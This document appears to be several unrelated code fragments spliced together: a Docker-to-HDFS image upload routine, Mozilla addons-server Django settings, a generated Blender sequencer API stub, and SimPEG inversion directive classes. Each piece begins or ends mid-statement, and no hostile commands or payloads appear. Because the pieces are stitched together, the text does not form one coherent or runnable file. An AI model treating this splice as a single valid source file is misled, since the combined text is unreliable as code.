(skopeo_dir)) manifest, manifest_hash = get_local_manifest_from_path(skopeo_dir + "/manifest.json") layers = get_layer_hashes_from_manifest(manifest) config_hash = get_config_hash_from_manifest(manifest) logging.debug("Layers: %s", str(layers)) logging.debug("Config: %s", str(config_hash)) update_dicts_for_multiple_tags(hash_to_tags, tag_to_hash, tags, manifest_hash, image) all_layers_exist = True if not does_hdfs_entry_exist(hdfs_manifest_dir + "/" + manifest_hash, raise_on_error=False): all_layers_exist = False if not does_hdfs_entry_exist(hdfs_config_dir + "/" + config_hash, raise_on_error=False): all_layers_exist = False for layer in layers: hdfs_squash_path = hdfs_layers_dir + "/" + layer + ".sqsh" if not does_hdfs_entry_exist(hdfs_squash_path, raise_on_error=False): all_layers_exist = False break if all_layers_exist: if not force: logging.info("All layers exist in HDFS, skipping this image") continue logging.info("All layers exist in HDFS, but force option set, so overwriting image") for layer in layers: hdfs_squash_path = hdfs_layers_dir + "/" + layer + ".sqsh" if does_hdfs_entry_exist(hdfs_squash_path, raise_on_error=False): if force: logging.info("Layer already exists, but overwriting due to force" + "option: %s", layer) else: logging.info("Layer exists. Skipping and not squashifying or"
the top. 'olympia.amo.middleware.NonAtomicRequestsForSafeHttpMethodsMiddleware', # Test if it's an API request first so later middlewares don't need to. 'olympia.api.middleware.IdentifyAPIRequestMiddleware', # Gzip (for API only) middleware needs to be executed after every # modification to the response, so it's placed at the top of the list. 'olympia.api.middleware.GZipMiddlewareForAPIOnly', # Statsd and logging come first to get timings etc. Munging REMOTE_ADDR # must come before middlewares potentially using REMOTE_ADDR, so it's # also up there. 'django_statsd.middleware.GraphiteRequestTimingMiddleware', 'django_statsd.middleware.GraphiteMiddleware', 'olympia.amo.middleware.SetRemoteAddrFromForwardedFor', # AMO URL middleware is as high as possible to get locale/app aware URLs. 'olympia.amo.middleware.LocaleAndAppURLMiddleware', 'olympia.amo.middleware.RemoveSlashMiddleware', 'django.middleware.security.SecurityMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'multidb.middleware.PinningRouterMiddleware', 'waffle.middleware.WaffleMiddleware', # CSP and CORS need to come before CommonMiddleware because they might # need to add headers to 304 responses returned by CommonMiddleware. 'csp.middleware.CSPMiddleware', 'corsheaders.middleware.CorsMiddleware', # Enable conditional processing, e.g ETags. 'django.middleware.http.ConditionalGetMiddleware', 'olympia.amo.middleware.CommonMiddleware', 'olympia.amo.middleware.NoVarySessionMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'olympia.amo.middleware.AuthenticationMiddlewareWithoutAPI', # Our middleware that adds additional information for the user # and API about our read-only status. 'olympia.amo.middleware.ReadOnlyMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', # This should come after AuthenticationMiddlewareWithoutAPI (to get the # current user) and after SetRemoteAddrFromForwardedFor (to get the correct # IP). 'olympia.access.middleware.UserAndAddrMiddleware', 'olympia.amo.middleware.RequestIdMiddleware', ) # Auth AUTH_USER_MODEL = 'users.UserProfile' # Override this in the site settings. ROOT_URLCONF = 'olympia.urls' INSTALLED_APPS = ( # The translations app *must* be the very first. This isn't necessarily # relevant for daily business but very important for running initial # migrations during our tests and local setup. # Foreign keys to the `translations` table point to `id` which isn't # unique on it's own but has a (id, locale) unique_together index. # If `translations` would come after `olympia.addons` for example # Django tries to first, create the table translations, then create the # addons table, then adds the foreign key and only after that adds the # unique_together index to `translations`. MySQL needs that index to be # created first though, otherwise you'll run into # `ERROR 1215 (HY000): Cannot add foreign key constraint` errors. 'olympia.translations', 'olympia.core', 'olympia.amo', # amo comes first so it always takes precedence. 
'olympia.abuse', 'olympia.access', 'olympia.accounts', 'olympia.activity', 'olympia.addons', 'olympia.api', 'olympia.applications', 'olympia.bandwagon', 'olympia.blocklist', 'olympia.browse', 'olympia.devhub', 'olympia.discovery', 'olympia.files', 'olympia.git', 'olympia.hero', 'olympia.lib.es', 'olympia.lib.akismet', 'olympia.pages', 'olympia.promoted', 'olympia.ratings', 'olympia.reviewers', 'olympia.scanners', 'olympia.search', 'olympia.shelves', 'olympia.stats', 'olympia.tags', 'olympia.users', 'olympia.versions', 'olympia.yara', 'olympia.zadmin', # Third party apps 'csp', 'aesfield', 'django_extensions', 'rest_framework', 'waffle', 'django_jinja', 'puente', 'rangefilter', # Django contrib apps 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.messages', 'django.contrib.sessions', 'django.contrib.staticfiles', # Has to load after auth 'django_statsd', ) # These need to point to prod, because that's where the database lives. You can # change it locally to test the extraction process, but be careful not to # accidentally nuke translations when doing that! DISCOVERY_EDITORIAL_CONTENT_API = ( 'https://addons.mozilla.org/api/v4/discovery/editorial/') PRIMARY_HERO_EDITORIAL_CONTENT_API = ( 'https://addons.mozilla.org/api/v4/hero/primary/?all=true&raw') SECONDARY_HERO_EDITORIAL_CONTENT_API = ( 'https://addons.mozilla.org/api/v4/hero/secondary/?all=true') # Filename where the strings will be stored. Used in puente config below. EDITORIAL_CONTENT_FILENAME = 'src/olympia/discovery/strings.jinja2' # Tells the extract script what files to look for l10n in and what function # handles the extraction. The puente library expects this. PUENTE = { 'BASE_DIR': ROOT, # Tells the extract script what files to look for l10n in and what function # handles the extraction. 'DOMAIN_METHODS': { 'django': [ ('src/olympia/**.py', 'python'), # Extract the generated file containing editorial content for all # disco pane recommendations using jinja2 parser. It's not a real # template, but it uses jinja2 syntax for convenience, hence why # it's not in templates/ with a .html extension. (EDITORIAL_CONTENT_FILENAME, 'jinja2'), # Make sure we're parsing django-admin & email templates with the # django template extractor. This should match the behavior of # JINJA_EXCLUDE_TEMPLATE_PATHS ( 'src/olympia/**/templates/**/emails/**.*', 'django_babel.extract.extract_django' ), ( '**/templates/admin/**.html', 'django_babel.extract.extract_django' ), ('src/olympia/**/templates/**.html', 'jinja2'), ], 'djangojs': [ # We can't say **.js because that would dive into mochikit # and timeplot and all the other baggage we're carrying. # Timeplot, in particular, crashes the extractor with bad # unicode data. ('static/js/**-all.js', 'ignore'), ('static/js/**-min.js', 'ignore'), ('static/js/*.js', 'javascript'), ('static/js/amo2009/**.js', 'javascript'), ('static/js/common/**.js', 'javascript'), ('static/js/impala/**.js', 'javascript'), ('static/js/zamboni/**.js', 'javascript'), ], }, } # Bundles is a dictionary of two dictionaries, css and js, which list css files # and js files that can be bundled together by the minify app. MINIFY_BUNDLES = { 'css': { 'restyle/css': ( 'css/restyle/restyle.less', ), # CSS files our DevHub (currently only required for the # new landing page) 'devhub/new-landing/css': ( 'css/devhub/new-landing/base.less', ), # Responsive error page styling. 'errors/css': ( 'css/errors/base.less', ), # CSS files common to the entire site. 
'zamboni/css': ( 'css/legacy/main.css', 'css/legacy/main-mozilla.css', 'css/legacy/jquery-lightbox.css', 'css/zamboni/zamboni.css', 'css/zamboni/tags.css', 'css/zamboni/tabs.css', 'css/impala/buttons.less', 'css/impala/formset.less', 'css/impala/suggestions.less', 'css/impala/header.less', 'css/impala/moz-tab.css', 'css/impala/footer.less', 'css/impala/faux-zamboni.less', ), 'zamboni/impala': ( 'css/impala/base.css', 'css/legacy/jquery-lightbox.css', 'css/impala/site.less', 'css/impala/typography.less', 'css/impala/forms.less', 'css/common/invisible-upload.less', 'css/impala/header.less', 'css/impala/footer.less', 'css/impala/moz-tab.css', 'css/impala/hovercards.less', 'css/impala/toplist.less', 'css/impala/carousel.less', 'css/impala/ratings.less', 'css/impala/buttons.less', 'css/impala/promos.less', 'css/impala/addon_details.less', 'css/impala/policy.less', 'css/impala/expando.less', 'css/impala/popups.less', 'css/impala/l10n.less', 'css/impala/lightbox.less', 'css/impala/prose.less', 'css/impala/abuse.less', 'css/impala/paginator.less', 'css/impala/listing.less', 'css/impala/versions.less', 'css/impala/users.less', 'css/impala/tooltips.less', 'css/impala/search.less', 'css/impala/suggestions.less', 'css/node_lib/jquery.minicolors.css', 'css/impala/login.less', 'css/impala/dictionaries.less', 'css/impala/apps.less', 'css/impala/formset.less', 'css/impala/tables.less', 'css/impala/compat.less', ), 'zamboni/stats': ( 'css/impala/stats.less', ), 'zamboni/discovery-pane': ( 'css/impala/promos.less', 'css/legacy/jquery-lightbox.css', ), 'zamboni/devhub': ( 'css/impala/tooltips.less', 'css/zamboni/developers.css', 'css/zamboni/docs.less', 'css/impala/developers.less', 'css/devhub/listing.less', 'css/devhub/popups.less', 'css/devhub/compat.less', 'css/impala/formset.less', 'css/devhub/forms.less', 'css/common/invisible-upload.less', 'css/devhub/submission.less', 'css/devhub/refunds.less', 'css/devhub/buttons.less', 'css/devhub/in-app-config.less', 'css/devhub/static-theme.less', 'css/node_lib/jquery.minicolors.css', ), 'zamboni/devhub_impala': ( 'css/impala/developers.less', 'css/devhub/listing.less', 'css/devhub/popups.less', 'css/devhub/compat.less', 'css/devhub/dashboard.less', 'css/devhub/forms.less', 'css/common/invisible-upload.less', 'css/devhub/submission.less', 'css/devhub/search.less', 'css/devhub/refunds.less', 'css/impala/devhub-api.less', ), 'zamboni/reviewers': ( 'css/zamboni/reviewers.less', 'css/zamboni/unlisted.less', ), 'zamboni/themes_review': ( 'css/zamboni/developers.css', 'css/zamboni/reviewers.less', 'css/zamboni/themes_review.less', ), 'zamboni/admin': ( 'css/zamboni/admin-django.css', 'css/zamboni/admin-mozilla.css', 'css/zamboni/admin_features.css', ), }, 'js': { # JS files common to the entire site, apart from dev-landing. 
'common': ( 'js/node_lib/underscore.js', 'js/zamboni/browser.js', 'js/amo2009/addons.js', 'js/zamboni/init.js', 'js/impala/capabilities.js', 'js/lib/format.js', 'js/node_lib/jquery.cookie.js', 'js/zamboni/storage.js', 'js/zamboni/buttons.js', 'js/zamboni/tabs.js', 'js/common/keys.js', # jQuery UI 'js/node_lib/ui/version.js', 'js/node_lib/ui/data.js', 'js/node_lib/ui/disable-selection.js', 'js/node_lib/ui/ie.js', 'js/node_lib/ui/keycode.js', 'js/node_lib/ui/escape-selector.js', 'js/node_lib/ui/labels.js', 'js/node_lib/ui/jquery-1-7.js', 'js/node_lib/ui/plugin.js', 'js/node_lib/ui/safe-active-element.js', 'js/node_lib/ui/safe-blur.js', 'js/node_lib/ui/scroll-parent.js', 'js/node_lib/ui/focusable.js', 'js/node_lib/ui/tabbable.js', 'js/node_lib/ui/unique-id.js', 'js/node_lib/ui/position.js', 'js/node_lib/ui/widget.js', 'js/node_lib/ui/menu.js', 'js/node_lib/ui/mouse.js', 'js/node_lib/ui/autocomplete.js', 'js/node_lib/ui/datepicker.js', 'js/node_lib/ui/sortable.js', 'js/zamboni/helpers.js', 'js/common/banners.js', 'js/zamboni/global.js', 'js/amo2009/global.js', 'js/common/ratingwidget.js', 'js/node_lib/jqModal.js', 'js/zamboni/l10n.js', 'js/zamboni/debouncer.js', # Homepage 'js/zamboni/homepage.js', # Add-ons details page 'js/lib/ui.lightbox.js', 'js/zamboni/addon_details.js', 'js/impala/abuse.js', 'js/zamboni/ratings.js', 'js/lib/jquery.hoverIntent.js', # Unicode letters for our makeslug function 'js/zamboni/unicode.js', # Users 'js/zamboni/users.js', # Search suggestions 'js/impala/forms.js', 'js/impala/ajaxcache.js', 'js/impala/suggestions.js', 'js/impala/site_suggestions.js', ), # Impala and Legacy: Things to be loaded at the top of the page 'preload': ( 'js/node_lib/jquery.js', 'js/node_lib/jquery.browser.js', 'js/impala/preloaded.js', 'js/zamboni/analytics.js', ), # Impala: Things to be loaded at the bottom 'impala': ( 'js/lib/ngettext-overload.js', 'js/node_lib/underscore.js', 'js/impala/carousel.js', 'js/zamboni/browser.js', 'js/amo2009/addons.js', 'js/zamboni/init.js', 'js/impala/capabilities.js', 'js/lib/format.js', 'js/node_lib/jquery.cookie.js', 'js/zamboni/storage.js', 'js/zamboni/buttons.js', 'js/node_lib/jquery.pjax.js', # jquery.pjax.js is missing a semicolon at the end which breaks # our wonderful minification process... so add one. 'js/lib/semicolon.js', # It's just a semicolon! 
'js/impala/footer.js', 'js/common/keys.js', # jQuery UI 'js/node_lib/ui/version.js', 'js/node_lib/ui/data.js', 'js/node_lib/ui/disable-selection.js', 'js/node_lib/ui/ie.js', 'js/node_lib/ui/keycode.js', 'js/node_lib/ui/escape-selector.js', 'js/node_lib/ui/labels.js', 'js/node_lib/ui/jquery-1-7.js', 'js/node_lib/ui/plugin.js', 'js/node_lib/ui/safe-active-element.js', 'js/node_lib/ui/safe-blur.js', 'js/node_lib/ui/scroll-parent.js', 'js/node_lib/ui/focusable.js', 'js/node_lib/ui/tabbable.js', 'js/node_lib/ui/unique-id.js', 'js/node_lib/ui/position.js', 'js/node_lib/ui/widget.js', 'js/node_lib/ui/mouse.js', 'js/node_lib/ui/menu.js', 'js/node_lib/ui/autocomplete.js', 'js/node_lib/ui/datepicker.js', 'js/node_lib/ui/sortable.js', 'js/lib/truncate.js', 'js/zamboni/truncation.js', 'js/impala/ajaxcache.js', 'js/zamboni/helpers.js', 'js/common/banners.js', 'js/zamboni/global.js', 'js/impala/global.js', 'js/common/ratingwidget.js', 'js/node_lib/jqModal.js', 'js/zamboni/l10n.js', 'js/impala/forms.js', # Add-ons details page 'js/lib/ui.lightbox.js', 'js/impala/addon_details.js', 'js/impala/abuse.js', 'js/impala/ratings.js', # Browse listing pages 'js/impala/listing.js', 'js/lib/jquery.hoverIntent.js', 'js/common/upload-image.js', 'js/node_lib/jquery.minicolors.js', # Unicode letters for our makeslug function 'js/zamboni/unicode.js', # Users 'js/zamboni/users.js', 'js/impala/users.js', # Search 'js/impala/serializers.js', 'js/impala/search.js', 'js/impala/suggestions.js', 'js/impala/site_suggestions.js', # Login 'js/impala/login.js', ), 'zamboni/discovery': ( 'js/node_lib/jquery.js', 'js/node_lib/jquery.browser.js', 'js/node_lib/underscore.js', 'js/zamboni/browser.js', 'js/zamboni/init.js', 'js/impala/capabilities.js', 'js/lib/format.js', 'js/impala/carousel.js', 'js/zamboni/analytics.js', # Add-ons details 'js/node_lib/jquery.cookie.js', 'js/zamboni/storage.js', 'js/zamboni/buttons.js', 'js/lib/ui.lightbox.js', 'js/lib/jquery.hoverIntent.js', 'js/zamboni/debouncer.js', 'js/lib/truncate.js', 'js/zamboni/truncation.js', ), 'zamboni/devhub': ( 'js/lib/truncate.js', 'js/zamboni/truncation.js', 'js/common/upload-base.js', 'js/common/upload-addon.js', 'js/common/upload-image.js', 'js/impala/formset.js', 'js/zamboni/devhub.js', 'js/zamboni/validator.js', 'js/node_lib/jquery.timeago.js', 'js/zamboni/static_theme.js', 'js/node_lib/jquery.minicolors.js', 'js/node_lib/jszip.js', ), 'devhub/new-landing/js': ( 'js/common/lang_switcher.js', 'js/lib/basket-client.js', ), 'zamboni/reviewers': ( 'js/lib/highcharts.src.js', 'js/lib/jquery.hoverIntent.js', # Used by jquery.zoomBox. 'js/lib/jquery.zoomBox.js', # Used by themes_review. 'js/zamboni/reviewers.js', 'js/zamboni/themes_review_templates.js', 'js/zamboni/themes_review.js', ), 'zamboni/stats': ( 'js/lib/highcharts.src.js', 'js/impala/stats/csv_keys.js', 'js/impala/stats/helpers.js', 'js/impala/stats/dateutils.js', 'js/impala/stats/manager.js', 'js/impala/stats/controls.js', 'js/impala/stats/overview.js', 'js/impala/stats/topchart.js', 'js/impala/stats/chart.js', 'js/impala/stats/table.js', 'js/impala/stats/stats.js', ), 'zamboni/admin': ( 'js/zamboni/admin.js', 'js/zamboni/admin_features.js', 'js/zamboni/admin_validation.js', ), # This is included when DEBUG is True. Bundle in <head>. 
'debug': ( 'js/debug/less_setup.js', 'js/node_lib/less.js', 'js/debug/less_live.js', ), } } # Prefix for cache keys (will prevent collisions when running parallel copies) # This value is being used by `conf/settings/{dev,stage,prod}.py CACHE_KEY_PREFIX = 'amo:%s:' % build_id CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_KEY_PREFIX FETCH_BY_ID = True # Number of seconds a count() query should be cached. Keep it short because # it's not possible to invalidate these queries. CACHE_COUNT_TIMEOUT = 60 # To enable pylibmc compression (in bytes) PYLIBMC_MIN_COMPRESS_LEN = 0 # disabled # External tools. JAVA_BIN = '/usr/bin/java' # File paths ADDON_ICONS_DEFAULT_PATH = os.path.join(ROOT, 'static', 'img', 'addon-icons') # URL paths # paths for images, e.g. mozcdn.com/amo or '/static' VAMO_URL = 'https://versioncheck.addons.mozilla.org' # Outgoing URL bouncer REDIRECT_URL = 'https://outgoing.prod.mozaws.net/v1/' REDIRECT_SECRET_KEY = env('REDIRECT_SECRET_KEY', default='') # Allow URLs from these servers. Use full domain names. REDIRECT_URL_ALLOW_LIST = ['addons.mozilla.org'] # Default to short expiration; check "remember me" to override SESSION_ENGINE = 'django.contrib.sessions.backends.signed_cookies' # See: https://github.com/mozilla/addons-server/issues/1789 SESSION_EXPIRE_AT_BROWSER_CLOSE = False # This value must be kept in sync with authTokenValidFor from addons-frontend: # https://github.com/mozilla/addons-frontend/blob/2f480b474fe13a676237fe76a1b2a057e4a2aac7/config/default-amo.js#L111 SESSION_COOKIE_AGE = 2592000 # 30 days SESSION_COOKIE_SECURE = True SESSION_COOKIE_HTTPONLY = True SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN # bug 608797 MESSAGE_STORAGE = 'django.contrib.messages.storage.cookie.CookieStorage' WAFFLE_SECURE = True # These should have app+locale at the
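# A minimal, hypothetical sketch (not part of the settings module above) illustrating two of
# its comments: the 30-day SESSION_COOKIE_AGE arithmetic and how a build-id based
# CACHE_KEY_PREFIX keeps parallel deployments from sharing cache entries. The build ids
# below are made up for illustration.
if __name__ == '__main__':
    assert 30 * 24 * 60 * 60 == 2592000  # SESSION_COOKIE_AGE is expressed in seconds

    def cache_key(prefix, key):
        # Same shape as CACHE_KEY_PREFIX = 'amo:%s:' % build_id above.
        return '%s%s' % (prefix, key)

    prefix_a = 'amo:%s:' % 'build-123'   # hypothetical build id
    prefix_b = 'amo:%s:' % 'build-456'   # hypothetical build id
    # Two parallel copies never collide on the same logical key.
    assert cache_key(prefix_a, 'addon:42') != cache_key(prefix_b, 'addon:42')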
<gh_stars>1-10 import sys import typing import bpy_types import bl_ui.space_toolsystem_common import bl_ui.properties_grease_pencil_common import rna_prop_ui class SEQUENCER_HT_header(bpy_types.Header, bpy_types._GenericUI): bl_rna = None ''' ''' bl_space_type = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self): ''' ''' pass def is_extended(self): ''' ''' pass def is_property_hidden(self): ''' ''' pass def is_property_overridable_library(self): ''' ''' pass def is_property_readonly(self): ''' ''' pass def is_property_set(self): ''' ''' pass def items(self): ''' ''' pass def keyframe_delete(self): ''' ''' pass def keyframe_insert(self): ''' ''' pass def keys(self): ''' ''' pass def path_from_id(self): ''' ''' pass def path_resolve(self): ''' ''' pass def pop(self): ''' ''' pass def prepend(self, draw_func): ''' ''' pass def property_overridable_library_set(self): ''' ''' pass def property_unset(self): ''' ''' pass def remove(self, draw_func): ''' ''' pass def type_recast(self): ''' ''' pass def values(self): ''' ''' pass class SEQUENCER_HT_tool_header(bpy_types.Header, bpy_types._GenericUI): bl_region_type = None ''' ''' bl_rna = None ''' ''' bl_space_type = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, context): ''' ''' pass def draw_tool_settings(self, context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self): ''' ''' pass def is_extended(self): ''' ''' pass def is_property_hidden(self): ''' ''' pass def is_property_overridable_library(self): ''' ''' pass def is_property_readonly(self): ''' ''' pass def is_property_set(self): ''' ''' pass def items(self): ''' ''' pass def keyframe_delete(self): ''' ''' pass def keyframe_insert(self): ''' ''' pass def keys(self): ''' ''' pass def path_from_id(self): ''' ''' pass def path_resolve(self): ''' ''' pass def pop(self): ''' ''' pass def prepend(self, draw_func): ''' ''' pass def property_overridable_library_set(self): ''' ''' pass def property_unset(self): ''' ''' pass def remove(self, draw_func): ''' ''' pass def type_recast(self): ''' ''' pass def values(self): ''' ''' pass class SEQUENCER_MT_add(bpy_types.Menu, bpy_types._GenericUI): bl_label = None ''' ''' bl_rna = None ''' ''' bl_translation_context = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, context): ''' ''' pass def draw_collapsible(self, context, layout): ''' ''' pass def draw_preset(self, _context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self): ''' ''' pass def is_extended(self): ''' ''' pass def is_property_hidden(self): ''' ''' pass def is_property_overridable_library(self): ''' ''' pass def is_property_readonly(self): ''' ''' pass def is_property_set(self): ''' ''' pass def items(self): ''' ''' pass def keyframe_delete(self): ''' ''' pass def keyframe_insert(self): ''' ''' pass def keys(self): ''' ''' pass def path_from_id(self): ''' ''' pass def path_menu(self, 
searchpaths, operator, props_default, prop_filepath, filter_ext, filter_path, display_name, add_operator): ''' ''' pass def path_resolve(self): ''' ''' pass def pop(self): ''' ''' pass def prepend(self, draw_func): ''' ''' pass def property_overridable_library_set(self): ''' ''' pass def property_unset(self): ''' ''' pass def remove(self, draw_func): ''' ''' pass def type_recast(self): ''' ''' pass def values(self): ''' ''' pass class SEQUENCER_MT_add_effect(bpy_types.Menu, bpy_types._GenericUI): bl_label = None ''' ''' bl_rna = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, context): ''' ''' pass def draw_collapsible(self, context, layout): ''' ''' pass def draw_preset(self, _context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self): ''' ''' pass def is_extended(self): ''' ''' pass def is_property_hidden(self): ''' ''' pass def is_property_overridable_library(self): ''' ''' pass def is_property_readonly(self): ''' ''' pass def is_property_set(self): ''' ''' pass def items(self): ''' ''' pass def keyframe_delete(self): ''' ''' pass def keyframe_insert(self): ''' ''' pass def keys(self): ''' ''' pass def path_from_id(self): ''' ''' pass def path_menu(self, searchpaths, operator, props_default, prop_filepath, filter_ext, filter_path, display_name, add_operator): ''' ''' pass def path_resolve(self): ''' ''' pass def pop(self): ''' ''' pass def prepend(self, draw_func): ''' ''' pass def property_overridable_library_set(self): ''' ''' pass def property_unset(self): ''' ''' pass def remove(self, draw_func): ''' ''' pass def type_recast(self): ''' ''' pass def values(self): ''' ''' pass class SEQUENCER_MT_add_empty(bpy_types.Menu, bpy_types._GenericUI): bl_label = None ''' ''' bl_rna = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, _context): ''' ''' pass def draw_collapsible(self, context, layout): ''' ''' pass def draw_preset(self, _context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self): ''' ''' pass def is_extended(self): ''' ''' pass def is_property_hidden(self): ''' ''' pass def is_property_overridable_library(self): ''' ''' pass def is_property_readonly(self): ''' ''' pass def is_property_set(self): ''' ''' pass def items(self): ''' ''' pass def keyframe_delete(self): ''' ''' pass def keyframe_insert(self): ''' ''' pass def keys(self): ''' ''' pass def path_from_id(self): ''' ''' pass def path_menu(self, searchpaths, operator, props_default, prop_filepath, filter_ext, filter_path, display_name, add_operator): ''' ''' pass def path_resolve(self): ''' ''' pass def pop(self): ''' ''' pass def prepend(self, draw_func): ''' ''' pass def property_overridable_library_set(self): ''' ''' pass def property_unset(self): ''' ''' pass def remove(self, draw_func): ''' ''' pass def type_recast(self): ''' ''' pass def values(self): ''' ''' pass class SEQUENCER_MT_add_transitions(bpy_types.Menu, bpy_types._GenericUI): bl_label = None ''' ''' bl_rna = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, 
context): ''' ''' pass def draw_collapsible(self, context, layout): ''' ''' pass def draw_preset(self, _context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self): ''' ''' pass def is_extended(self): ''' ''' pass def is_property_hidden(self): ''' ''' pass def is_property_overridable_library(self): ''' ''' pass def is_property_readonly(self): ''' ''' pass def is_property_set(self): ''' ''' pass def items(self): ''' ''' pass def keyframe_delete(self): ''' ''' pass def keyframe_insert(self): ''' ''' pass def keys(self): ''' ''' pass def path_from_id(self): ''' ''' pass def path_menu(self, searchpaths, operator, props_default, prop_filepath, filter_ext, filter_path, display_name, add_operator): ''' ''' pass def path_resolve(self): ''' ''' pass def pop(self): ''' ''' pass def prepend(self, draw_func): ''' ''' pass def property_overridable_library_set(self): ''' ''' pass def property_unset(self): ''' ''' pass def remove(self, draw_func): ''' ''' pass def type_recast(self): ''' ''' pass def values(self): ''' ''' pass class SEQUENCER_MT_change(bpy_types.Menu, bpy_types._GenericUI): bl_label = None ''' ''' bl_rna = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, context): ''' ''' pass def draw_collapsible(self, context, layout): ''' ''' pass def draw_preset(self, _context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self):
self.chi0_ratio = self.chi0_ratio * np.ones(ndm) else: self.chi0_ratio = self.dmisfit.multipliers m = self.invProb.model dm_eigenvalue_list = [] for j, dm in enumerate(self.dmisfit.objfcts): dm_eigenvalue_list += [eigenvalue_by_power_iteration(dm, m)] self.chi0 = self.chi0_ratio / np.r_[dm_eigenvalue_list] self.chi0 = self.chi0 / np.sum(self.chi0) self.dmisfit.multipliers = self.chi0 if self.verbose: print("Scale Multipliers: ", self.dmisfit.multipliers) class JointScalingSchedule(InversionDirective): """ For multiple data misfits only: rebalance each data misfit term during the inversion when some datasets are fit, and others not using the ratios of current misfits and their respective target. It implements the strategy described in https://doi.org/10.1093/gji/ggaa378. """ verbose = False warmingFactor = 1.0 mode = 1 chimax = 1e10 chimin = 1e-10 update_rate = 1 def initialize(self): if ( getattr(self.dmisfit, "objfcts", None) is None or len(self.dmisfit.objfcts) == 1 ): raise TypeError("JointScalingSchedule only applies to joint inversion") targetclass = np.r_[ [ isinstance(dirpart, MultiTargetMisfits) for dirpart in self.inversion.directiveList.dList ] ] if ~np.any(targetclass): self.DMtarget = None else: self.targetclass = np.where(targetclass)[0][-1] self.DMtarget = self.inversion.directiveList.dList[ self.targetclass ].DMtarget if self.verbose: print("Initial data misfit scales: ", self.dmisfit.multipliers) def endIter(self): self.dmlist = self.inversion.directiveList.dList[self.targetclass].dmlist if np.any(self.dmlist < self.DMtarget): self.mode = 2 else: self.mode = 1 if self.opt.iter > 0 and self.opt.iter % self.update_rate == 0: if self.mode == 2: if np.all(np.r_[self.dmisfit.multipliers] > self.chimin) and np.all( np.r_[self.dmisfit.multipliers] < self.chimax ): indx = self.dmlist > self.DMtarget if np.any(indx): multipliers = self.warmingFactor * np.median( self.DMtarget[~indx] / self.dmlist[~indx] ) if np.sum(indx) == 1: indx = np.where(indx)[0][0] self.dmisfit.multipliers[indx] *= multipliers self.dmisfit.multipliers /= np.sum(self.dmisfit.multipliers) if self.verbose: print("Updating scaling for data misfits by ", multipliers) print("New scales:", self.dmisfit.multipliers) class TargetMisfit(InversionDirective): """ ... note:: Currently this target misfit is not set up for joint inversion. 
Check out MultiTargetMisfits """ chifact = 1.0 phi_d_star = None @property def target(self): if getattr(self, "_target", None) is None: # the factor of 0.5 is because we do phid = 0.5*||dpred - dobs||^2 if self.phi_d_star is None: nD = 0 for survey in self.survey: nD += survey.nD self.phi_d_star = 0.5 * nD self._target = self.chifact * self.phi_d_star return self._target @target.setter def target(self, val): self._target = val def endIter(self): if self.invProb.phi_d < self.target: self.opt.stopNextIteration = True self.print_final_misfit() def print_final_misfit(self): if self.opt.print_type == "ubc": self.opt.print_target = ( ">> Target misfit: %.1f (# of data) is achieved" ) % (self.target * self.invProb.opt.factor) class MultiTargetMisfits(InversionDirective): WeightsInTarget = 0 verbose = False # Chi factor for Geophsyical Data Misfit chifact = 1.0 phi_d_star = None # Chifact for Clustering/Smallness TriggerSmall = True chiSmall = 1.0 phi_ms_star = None # Tolerance for parameters difference with their priors TriggerTheta = False # deactivated by default ToleranceTheta = 1.0 distance_norm = np.inf AllStop = False DM = False # geophysical fit condition CL = False # petrophysical fit condition DP = False # parameters difference with their priors condition def initialize(self): self.dmlist = np.r_[[dmis(self.invProb.model) for dmis in self.dmisfit.objfcts]] if getattr(self.invProb.reg.objfcts[0], "objfcts", None) is not None: smallness = np.r_[ [ ( np.r_[ i, j, ( isinstance( regpart, PGIwithNonlinearRelationshipsSmallness, ) or isinstance(regpart, PGIsmallness) ), ] ) for i, regobjcts in enumerate(self.invProb.reg.objfcts) for j, regpart in enumerate(regobjcts.objfcts) ] ] if smallness[smallness[:, 2] == 1][:, :2].size == 0: warnings.warn( "There is no PGI regularization. Smallness target is turned off (TriggerSmall flag)" ) self.smallness = -1 self.pgi_smallness = None else: self.smallness = smallness[smallness[:, 2] == 1][:, :2][0] self.pgi_smallness = self.invProb.reg.objfcts[ self.smallness[0] 